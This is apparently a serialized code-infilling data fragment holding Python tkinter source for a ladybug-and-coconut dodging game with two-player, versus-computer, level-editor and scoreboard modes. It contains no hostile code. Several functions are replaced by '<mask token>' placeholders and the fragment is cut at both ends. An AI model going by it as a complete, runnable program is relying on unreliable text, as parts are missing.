canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\ndef twoPlayerKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'a' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player1X = 150\n if event.keysym == 'd' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player1X = 330\n if event.keysym == 'Left' and data.onLeft2 == False:\n data.onLeft2 = True\n data.player2X = 550\n if event.keysym == 'Right' and data.onLeft2 == True:\n data.onLeft2 = False\n data.player2X = 750\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef AIRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconutsAI1:\n coconut.draw(canvas)\n for coconut in data.coconutsAI2:\n coconut.draw(canvas)\n canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill\n ='yellow')\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n AIWinner(canvas, data)\n drawHome(canvas, data)\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef init(data):\n data.score = 0\n data.mode = 'splashScreen'\n data.timerDelay = 100\n data.height = 800\n data.width = 800\n data.speed = 10\n data.speedAI = 12\n data.speedAI2 = 12\n data.switchOnProgress = False\n data.r = 25\n data.cx = 280\n data.cy = 750\n data.onLeft1, data.onLeft2 = True, True\n data.win = False\n data.coconuts = []\n data.powerUps = []\n data.coconuts1 = []\n data.coconuts2 = []\n data.coconutsAI1 = []\n data.coconutsAI2 = []\n data.invincible = []\n data.pauseDrops = False\n data.pause1Drop = False\n data.pause2Drop = False\n init1(data)\n\n\ndef init1(data):\n data.beInvincible = False\n data.Invincible1 = False\n data.Invincible2 = False\n data.scaryBug = []\n data.time = 0\n data.coconutFall = False\n data.sides = ['r', 'l']\n data.level = 1\n data.splashScreenTime = 0\n data.splashScreenDrops = []\n data.background = PhotoImage(file='tree.gif')\n data.deadScreen = PhotoImage(file='deadBug.gif')\n data.ladyBug = PhotoImage(file='lady.gif')\n data.winScreen = PhotoImage(file='treeTop1.gif')\n data.winBug = PhotoImage(file='littleBug.gif')\n data.halfBackground = PhotoImage(file='halfTree.gif')\n data.umbrella = PhotoImage(file='umbrella2.gif')\n data.spider = PhotoImage(file='spider.gif')\n data.hourGlass = PhotoImage(file='hourGlass.gif')\n data.splashScreen = PhotoImage(file='splash.gif')\n init2(data)\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\ndef initScoreBoardHelp(data):\n data.tbgY = 5 * data.height / 12\n data.txtTScore = 150\n data.S_P = 220\n data.numScores = 5\n data.scorePos = data.height / 10\n data.scoreShift = 270\n data.helpY = data.height / 2 - 20\n data.name = ''\n data.printName = ''\n data.hit = False\n initAI(data)\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\ndef keyPressed(event, data):\n if data.mode == 'splashScreen':\n splashKeyPressed(event, data)\n elif data.mode == '1Player':\n playerKeyPressed(event, data)\n elif data.mode == '2Player':\n twoPlayerKeyPressed(event, data)\n elif data.mode == 'editor':\n editorKeyPressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedKeyPressed(event, data)\n elif data.mode == 'AI':\n AIKeyPressed(event, data)\n elif data.mode == 'difficulty':\n difficultyKeyPressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardKeyPressed(event, data)\n elif data.mode == 'help':\n helpKeyPressed(event, data)\n\n\ndef timerFired(data):\n if data.mode == 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\ndef splashScreenMousePressed(event, data):\n if (data.splashButtonY - 2 * data.r <= event.x <= data.splashButtonY + \n 2 * data.r):\n if data.p1ButtonX - data.r <= event.y <= 